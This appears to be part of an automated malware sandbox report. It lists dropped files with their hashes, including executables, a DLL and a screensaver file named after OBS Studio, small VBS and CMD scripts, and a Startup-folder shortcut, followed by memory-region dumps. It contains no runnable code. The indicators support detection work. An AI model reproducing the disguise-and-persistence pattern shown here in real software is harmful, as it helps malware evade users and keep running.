SHA512c2772893695f49cb185add62c35284779b20d45adc01184f1912613fa8b2d70c8e785f0d7cfa3bfaf1d2d58e7cdc74f4304fd973a956601927719d6d370dd57a
-
C:\Users\Admin\AppData\Local\Temp\z7fd3w5dvi22240627656.tmpFilesize
40KB
MD5b608d407fc15adea97c26936bc6f03f6
SHA1953e7420801c76393902c0d6bb56148947e41571
SHA256b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf
SHA512cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4
-
C:\Users\Admin\AppData\Local\Temp\zb0ng5pb8m3ia6u240640750.tmpFilesize
2KB
MD572226ce1e48e7c50502b5b5239424af7
SHA13bf83562a093e8ad37c82b77a99d06805c41b041
SHA256c0e5676a103c3344bbec068ff82ea07779e6c8729384d1d3f80fd90d74f383b2
SHA51246f61f0f2bb913795e11197db1d239aebdc6f858d8c2f8518d7526a6d954f71e19a225d5a1cfee36d5efa29e0680729d2b86399dd8f8320d9ddced184ca58ae7
-
C:\Users\Admin\AppData\Local\Temp\zkmttbs67240628031.tmpFilesize
6KB
MD52a874b66cc222a3acf7a5bc1feeebff0
SHA18763a86147b50c11f90e092de8fdfb37ec8d4ecb
SHA256960cb3d68c4208aced7c06d4697c5fdc08890cb591e6814112810f6c42c9837c
SHA512f32b01536d66f917251a69382f6fcf76bd8cef7b252e5c9e5166ec44a5435a4dcf4d661245630f950de976bd65c0cb83db9c3da338bba09f7823a1c37d4a77b4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
6KB
MD5915098854a3c908e35d433a1ff3096a4
SHA1f81b3b513fd5c6f0207a120a9159f75ce5d2f48d
SHA25697e4d8572d30baf95ad478d9f1db226d3ef140da2b9965f9353da50129a8c76b
SHA512d0820ef44a5b0d34cabf4e7f6c0182ea37e51fc1f1ecfdb484b80affc3b106db6117bce9ad48ea1b57dd9d81595a360d51a37173de412276dbf46a247911e0ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnkFilesize
391B
MD5612b32a6b6df414cef6696d7fda53fb1
SHA1c512aa6169d377efafb52b94fc14925a91cf904b
SHA2566b6dc161b0839b626576da0a2e24e3e77670fedd23fc9ddb582f80dc60cb014a
SHA512b179f50c7f0326f1be4a65c248e6018e0953bf579b878fcb1c1f8661cf83897cb0a828a23adc689cbe36374125abc357a04959380ee8ebb0b745602fc78f064f
-
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmdFilesize
186B
MD5afffe3a76201bab24e3d8d386a350c08
SHA152d0648d0a111094106689a98c79feefbce900ec
SHA2565f3d093e7c36368668ed7350d4e1ab3aab677285505f1b18fc98430c7ef8d3f3
SHA5124a9c3d2b129e590454dd8e80030b420ceccb03f13e70267bff1733a8cf475c625893859702395aad22f048e03aede5b78a8163f8304e34b64f8733ac19179136
-
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbsFilesize
67B
MD56229084e8a7b939a67a9cb8f385e9f1a
SHA11131557d825c526f066e74ad77bbf6d588ce7408
SHA25633bfc99196fb169f0ff2f8a83e72a5d47cdb01c9fab7abda154c935b08120e3d
SHA512a635e61fae2cb486865dfbfd57fa0f80e81108004e814bd50a7f7bc81189238a629a21acd75ec34796f14f50e7f9f0c9a19263a3d03e4a65a27eb6e03fa16fb6
-
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xmlFilesize
3KB
MD57ff486b05598204237fe9e3ac6703451
SHA175e4f1c95179746f7796dbfe39fdfaf6362b0a21
SHA25631cba67e2887f3e576d0040ab086e84b0596530afca703e4c990b9e402b99b1e
SHA51241bfe96541eb55b22d329d49b5ae13914ddb5400560bbf02d3f4e207308ed06045f14a8de5c27092b7cc89203dfe140200e72f069b65a44b16afd05393a358a7
-
C:\tmp\.vbsFilesize
211B
MD5f6d7083bea77728d624e8fda51da7965
SHA18bfd8154d7c57b94cddd9419ae36ccbcbc3bab97
SHA2563df3856f21bd818f2c16db064f837c36b647366caf8599bdcf933683f6f8bf99
SHA512645dab7e20a8f5221ccf66013321abc68cb38dd244b1c92fd128831e89a4089ca86a31857bfb201b5eaec712328c3d1fe558aa133374cf8998cc0af0f9d8ea49
-
C:\tmp\obs32.dllFilesize
6.6MB
MD50fe444048a4000a3bca0da179b50dc6c
SHA14aad3c1318e26e1a4adb26e52cba3699492ea1e3
SHA256a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261
SHA512c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab
-
C:\tmp\obs32.dllFilesize
6.6MB
MD50fe444048a4000a3bca0da179b50dc6c
SHA14aad3c1318e26e1a4adb26e52cba3699492ea1e3
SHA256a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261
SHA512c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab
-
C:\tmp\obs32.dllFilesize
6.6MB
MD50fe444048a4000a3bca0da179b50dc6c
SHA14aad3c1318e26e1a4adb26e52cba3699492ea1e3
SHA256a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261
SHA512c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab
-
C:\tmp\obs64.exeFilesize
15.9MB
MD5315048e1d18f5746ae0417a4278ff3ab
SHA1c083af385df168dff76f4ad7b6c22acc6314f75f
SHA256c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab
SHA5122960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468
-
C:\tmp\obs64.exeFilesize
15.9MB
MD5315048e1d18f5746ae0417a4278ff3ab
SHA1c083af385df168dff76f4ad7b6c22acc6314f75f
SHA256c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab
SHA5122960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468
-
C:\tmp\obs64.exeFilesize
15.9MB
MD5315048e1d18f5746ae0417a4278ff3ab
SHA1c083af385df168dff76f4ad7b6c22acc6314f75f
SHA256c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab
SHA5122960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468
-
C:\tmp\obs64.scrFilesize
15.3MB
MD5a2e4ea727ac977f1a958d0886f7d354e
SHA1695705eb4878c240bc957d144d9b9efd71efe2cf
SHA256d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3
SHA512a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc
-
C:\tmp\obs64.scrFilesize
15.3MB
MD5a2e4ea727ac977f1a958d0886f7d354e
SHA1695705eb4878c240bc957d144d9b9efd71efe2cf
SHA256d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3
SHA512a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc
-
C:\tmp\obs64.scrFilesize
15.3MB
MD5a2e4ea727ac977f1a958d0886f7d354e
SHA1695705eb4878c240bc957d144d9b9efd71efe2cf
SHA256d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3
SHA512a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc
-
memory/64-226-0x0000000000000000-mapping.dmp
-
memory/372-165-0x0000000000000000-mapping.dmp
-
memory/376-158-0x0000000000000000-mapping.dmp
-
memory/504-190-0x0000000000000000-mapping.dmp
-
memory/748-176-0x0000000000000000-mapping.dmp
-
memory/984-180-0x0000000000000000-mapping.dmp
-
memory/1004-194-0x0000000000000000-mapping.dmp
-
memory/1264-143-0x0000000000000000-mapping.dmp
-
memory/1352-209-0x0000000000000000-mapping.dmp
-
memory/1500-231-0x0000000000000000-mapping.dmp
-
memory/1644-196-0x0000000000000000-mapping.dmp
-
memory/1712-211-0x0000000000000000-mapping.dmp
-
memory/1772-185-0x0000000000000000-mapping.dmp
-
memory/1828-164-0x0000000000000000-mapping.dmp
-
memory/1876-245-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/1876-187-0x0000000000000000-mapping.dmp
-
memory/1876-247-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/1876-253-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/1904-230-0x0000000000000000-mapping.dmp
-
memory/1916-167-0x0000000000000000-mapping.dmp
-
memory/1988-169-0x0000000000000000-mapping.dmp
-
memory/2064-153-0x00007FFFE8230000-0x00007FFFE8CB0000-memory.dmpFilesize
10.5MB
-
memory/2064-151-0x0000000000000000-mapping.dmp
-
memory/2064-154-0x00007FFFE8230000-0x00007FFFE8CB0000-memory.dmpFilesize
10.5MB
-
memory/2180-274-0x0000000000400000-0x000000000086B000-memory.dmpFilesize
4.4MB
-
memory/2180-266-0x0000000000400000-0x000000000086B000-memory.dmpFilesize
4.4MB
-
memory/2180-264-0x0000000000400000-0x000000000086B000-memory.dmpFilesize
4.4MB
-
memory/2180-270-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2180-280-0x0000000003CD0000-0x0000000003D77000-memory.dmpFilesize
668KB
-
memory/2180-273-0x0000000003CD0000-0x0000000003D77000-memory.dmpFilesize
668KB
-
memory/2180-267-0x0000000000400000-0x000000000086B000-memory.dmpFilesize
4.4MB
-
memory/2180-269-0x0000000000400000-0x000000000086B000-memory.dmpFilesize
4.4MB
-
memory/2180-272-0x0000000011000000-0x0000000011158000-memory.dmpFilesize
1.3MB
-
memory/2180-271-0x0000000003CD0000-0x0000000003D77000-memory.dmpFilesize
668KB
-
memory/2724-160-0x0000000000000000-mapping.dmp
-
memory/2832-201-0x0000000000000000-mapping.dmp
-
memory/3240-181-0x0000000000000000-mapping.dmp
-
memory/3268-171-0x0000000000000000-mapping.dmp
-
memory/3304-287-0x00007FFFE7C30000-0x00007FFFE86F1000-memory.dmpFilesize
10.8MB
-
memory/3304-286-0x00007FFFE7C30000-0x00007FFFE86F1000-memory.dmpFilesize
10.8MB
-
memory/3304-172-0x0000000000000000-mapping.dmp
-
memory/3352-175-0x0000000000000000-mapping.dmp
-
memory/3392-183-0x0000000000000000-mapping.dmp
-
memory/3408-138-0x0000000000000000-mapping.dmp
-
memory/3420-191-0x0000000000000000-mapping.dmp
-
memory/3480-218-0x0000000000000000-mapping.dmp
-
memory/3516-248-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/3516-238-0x0000000000400000-0x000000000042D000-memory.dmpFilesize
180KB
-
memory/3552-259-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-260-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-257-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-254-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-268-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-258-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-263-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3552-255-0x0000000000400000-0x0000000002143000-memory.dmpFilesize
29.3MB
-
memory/3560-192-0x0000000000000000-mapping.dmp
-
memory/3564-168-0x0000000000000000-mapping.dmp
-
memory/3608-204-0x0000000000000000-mapping.dmp
-
memory/3612-200-0x0000000000000000-mapping.dmp
-
memory/3676-148-0x0000000000000000-mapping.dmp
-
memory/3704-202-0x0000000000000000-mapping.dmp
-
memory/3744-223-0x0000000000000000-mapping.dmp
-
memory/3756-186-0x0000000000000000-mapping.dmp
-
memory/3768-208-0x0000000000000000-mapping.dmp
-
memory/3828-179-0x0000000000000000-mapping.dmp
-
memory/3900-173-0x0000000000000000-mapping.dmp
-
memory/3964-210-0x0000000000000000-mapping.dmp
-
memory/3968-228-0x0000000000000000-mapping.dmp
-
memory/4004-227-0x0000000000000000-mapping.dmp
-
memory/4040-166-0x0000000000000000-mapping.dmp
-
memory/4064-189-0x0000000000000000-mapping.dmp
-
memory/4160-206-0x0000000000000000-mapping.dmp
-
memory/4176-178-0x0000000000000000-mapping.dmp
-
memory/4416-224-0x0000000000000000-mapping.dmp
-
memory/4440-157-0x0000000000000000-mapping.dmp
-
memory/4444-221-0x0000000000000000-mapping.dmp
-
memory/4512-199-0x0000000000000000-mapping.dmp
-
memory/4592-134-0x0000000000000000-mapping.dmp
-
memory/4612-225-0x0000000000000000-mapping.dmp
-
memory/4652-222-0x0000000000000000-mapping.dmp
-
memory/4684-170-0x0000000000000000-mapping.dmp
-
memory/4752-144-0x0000000000000000-mapping.dmp
-
memory/4756-217-0x0000000000000000-mapping.dmp
-
memory/4836-276-0x00007FFFE7C30000-0x00007FFFE86F1000-memory.dmpFilesize
10.8MB
-
memory/4836-275-0x00000232DFF40000-0x00000232DFF62000-memory.dmpFilesize
136KB
-
memory/4844-216-0x0000000000000000-mapping.dmp
-
memory/4856-197-0x0000000000000000-mapping.dmp
-
memory/4860-215-0x0000000000000000-mapping.dmp
-
memory/4952-142-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/4952-132-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/4952-137-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/4956-213-0x0000000000000000-mapping.dmp
-
memory/5000-163-0x0000000000000000-mapping.dmp
-
memory/5088-229-0x0000000000000000-mapping.dmp
-
memory/5096-147-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5096-140-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/5096-139-0x0000000000000000-mapping.dmp
-
memory/5096-240-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB